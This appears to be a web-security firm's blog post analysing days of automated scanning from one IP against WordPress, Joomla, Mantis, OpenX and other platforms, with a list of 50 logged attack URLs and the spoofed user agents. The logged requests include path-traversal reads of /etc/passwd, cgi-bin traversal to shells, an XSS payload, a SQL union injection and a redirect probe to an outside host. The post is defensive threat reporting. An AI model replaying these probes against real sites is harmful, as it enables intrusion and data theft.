We spend a lot of hours per day looking at attacks and logs of attacks both here at Trunc and at NOC for our WAF and CDN. And one IP has been hitting multiple of our sites every day for multiple days. Most the attack attempts are blocked automatically, but I thought it would be interesting to go through some of them to share here.
The attacker IP 50.16.95.X has been the number one abuser on our network for the past few days, trying different platforms, including WordPress, Joomla, Mantis Bug Tracker, OpenX/Revive Adserver, and others.
This IP attempted to access vulnerable endpoints at an average rate of 30 requests per minute (with some bursts of 150-200 requests per minutes on some periods). This has been continuous for days, which lead us to believe that the attacker behind it is using a mix of vulnerability scanning tool + custom pen-testing tool.
Overall, we counted more than 200,00 attack attempts just in the past few days fromi.
Here are the top 50 most frequent attack URLs observed in the logs, targeting various platforms. These attack requests demonstrate attempts to exploit known vulnerabilities in platforms such as WordPress, Joomla, and Mantis Bug Tracker. Below is a summary of the URLs used:
1. GET /mantis/verify.php?id=1&confirm_hash
2. GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash
3. GET /openx/www/delivery/lg.php?dest=http://interact.sh
4. GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar
5. GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd
6. GET /system/login/SysLoginUser.aspx?Login=Denied&UID=XSS
7. GET /components/com_rwcards/captcha/captcha_image.php
8. GET /ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
9. GET /mantis/admin/install.php?install=1
10. POST /wp-admin/admin-post.php?action=save_changes&setting_page=plugin_options
11. GET /revive-adserver-4.1.1/www/delivery/avw.php?zoneid=1&cb=INSERT_XSS_PAYLOAD_HERE
12. GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchField=antani'+union+select...
13. GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
14. GET /wp-content/plugins/wp-phpmyadmin-extension/custom_view.php?view=../../../../../../../../etc/passwd
15. POST /wp-json/wp/v2/users/me
16. GET /wp-content/themes/twentytwentyone/search.php?q=../../../../../etc/passwd
17. GET /xmlrpc.php?rsd
18. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
19. GET /adminer-4.3.1.php
20. GET /wp-login.php?action=lostpassword
21. POST /ajax-api/2.0/mlflow-artifacts/create
22. GET /components/com_sobi2/config.php
23. GET /wp-admin/async-upload.php?action=upload
24. GET /wp-admin/user-new.php?action=createuser
25. GET /wp-content/plugins/all-in-one-wp-security-and-firewall/admin.php?action=admin-settings
26. GET /wp-content/plugins/limit-login-attempts/admin.php?action=login_attempts
27. GET /wp-admin/includes/admin-post.php?action=deleteuser
28. GET /wp-json/wp/v2/media
29. GET /system/Login/SysLoginUser.aspx?action=login
30. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash
31. GET /joomla/configuration.php-dist
32. GET /administrator/index.php
33. GET /components/com_k2/store.php
34. GET /wp-content/uploads/
35. GET /wp-content/plugins/captcha/captcha_image.php
36. POST /wp-admin/options.php
37. GET /administrator/manifests/files/joomla.xml
38. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/ls
39. POST /wp-json/oembed/1.0/embeds
40. GET /administrator/components/com_virtuemart/classes/xml/configuration.xml
41. GET /wp-login.php?action=lostpassword
42. GET /joomla/administrator/components/com_banners/controllers/admin.php
43. GET /wp-admin/admin-ajax.php?action=wp_login
44. GET /administrator/index.php?option=com_banners
45. GET /components/com_flexicontent/helpers/html.php
46. GET /joomla/index.php?option=com_plugins&view=plugin&pluginname=captcha
47. GET /administrator/components/com_media/helpers/images.php
48. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/shutdown
49. POST /wp-admin/admin.php?page=wp_login
50. GET /xmlrpc.php?action=pingback.ping
The attacker used a total of **171 distinct user agents** throughout the attack. Here are the top user agents, listed by their frequency:
1. Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
2. Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
3. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.23
4. Mozilla/5.0 (Linux; Android 10; SM-N950F Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36
5. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
6. Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
7. Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
8. Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
9. Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
10. Mozilla/5.0 (X11; Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
11. Mozilla/5.0 (X11; Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
12. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
13. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
14. Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Mobile Safari/537.36
15. Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Mobile Safari/537.36
16. Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
17. Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
18. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
The variety of user agents indicates the use of automated tools attempting to evade detection by mimicking different browsers and platforms. This behavior is typical of botnets or automated vulnerability scanners. Many of these user agents are fake or invalid, further reinforcing the likelihood of automation.
On the plus side, rapid changing user agents can be used to discover malicious bots as this is not common for normal web traffic.
In addition to listing the top 50 attack requests, it’s crucial to understand the underlying vulnerabilities these requests are targeting. Below are detailed explanations of key attack vectors observed:
The attacker attempted to exploit vulnerabilities in the Mantis Bug Tracker by probing various verification scripts. Examples include:
GET /mantis/verify.php?id=1&confirm_hash
GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash
These requests are aimed at older versions of Mantis Bug Tracker, where vulnerabilities such as authentication bypass or session hijacking may exist.
The logs show attacks targeting WordPress plugins via the admin-ajax.php file. These attempts are designed to exploit XSS and CSRF vulnerabilities:
GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar
Attempts were made to exploit OpenX's ad server for malicious redirects:
GET /openx/www/delivery/lg.php?dest=http://interact.sh
These attacks could lead to malicious redirects, potentially exposing users to phishing or malware.
The following directory traversal attack targeted Joomla:
GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd
This exploit could allow attackers to read sensitive system files, such as `/etc/passwd`, to gain unauthorized access to the server.
Attempts were made to exploit ASP.NET login pages for cross-site scripting (XSS) attacks:
GET /system/login/SysLoginUser.aspx?Login=Denied&UID=XSS%3C%2Fscript%3E%3Cscript%3Ealert[ ](document.domain)%3C%2Fscript%3E
The attack patterns from IP 50.16.95.x show coordinated, high-frequency probing of multiple platforms, using a wide array of fake user agents to obfuscate activity. This kind of behavior is typical of vulnerability scanners or botnets attempting to exploit known software vulnerabilities. Web administrators should ensure all software is up to date and deploy Web Application Firewalls (WAF) to mitigate the impact of such attacks.